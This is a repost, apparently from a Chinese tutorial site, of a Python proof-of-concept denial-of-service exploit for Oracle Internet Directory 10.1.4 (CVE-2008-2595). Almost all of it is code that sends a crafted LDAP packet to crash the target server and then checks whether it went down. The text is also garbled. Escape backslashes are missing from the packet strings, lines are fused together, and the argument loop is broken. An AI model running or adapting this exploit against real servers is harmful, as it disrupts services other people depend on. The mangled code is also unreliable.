Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
发布时间:2016-02-19 来源:查字典编辑
摘要:#!/usr/bin/python"""OracleInternetDirectory10.1.4preauthenticationDeni...

#!/usr/bin/python"""

Oracle Internet Directory 10.1.4 preauthentication Denial Of ServiceNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.

Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one

shoot, but even when you only send one packet it will crash.Tested: Win2000 x86, WinXP x86, Win2003 X86_64Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)Fixed: Oracle Critical Patch Update July 2008

CVEID: CVE-2008-2595

"""import sys

import time

import sockethealthPacket = "0%x02x01x01c x04x00nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00"

packet = "x30x0ex02x01x01x60x09x30x01x03x04x02x44x4ex80x00"def checkHealth(hostname, port):

print " --> Wating 5 seconds"

time.sleep

(5)

print " --> Connecting to target..."

socket.setdefaulttimeout

(5)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((hostname, port)) try:

print " --> Sending 'health' packet ..."

s.sendall(healthPacket)

print " --> Trying to receive something..."

data = s.recv(1024)

except:

err = sys.exc_info()[1] if int(err[0]) == 104:

print "[ ] Exploits works!"

return if data != "":

print "[!] Server is up and running :("

else:

print "[?] Server doesn't answer nothing. It works?"def oidDos(hostname, port):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

print "[ ] Connecting to ldap://%s:%d..." % (hostname, port)

s.connect((hostname, int(port))) print "[ ] Sending packet..."

s.sendall(packet)

s.close() print "[ ] Checking OID's health..."

checkHealth(hostname, port)

except:

print sys.exc_info()[1]def usage():

print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"

print "Copyright (c) 2007 Joxean Koret"

print

print "Usage:"

print sys.argv[0],"-h -p"

printdef main():

if len(sys.argv) != 3:

usage()

sys.exit(0)

hostname = None

port = None i = 0

for param in sys.argv:

i = 1

if i == 1:

continue

if param.startswith("-h"):

hostname = param[2:]

elif param.startswith("-p"):

port = int(param[2:])

else:

print "Unknown option '%s'" % param

usage()

sys.exit

(1)

if not hostname or not port:

print "Bad command line."

usage()

sys.exit

(1) oidDos(hostname, port)if __name__ == "__main__":

main()

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新电脑安全教程学习
热门电脑安全教程学习
电脑子分类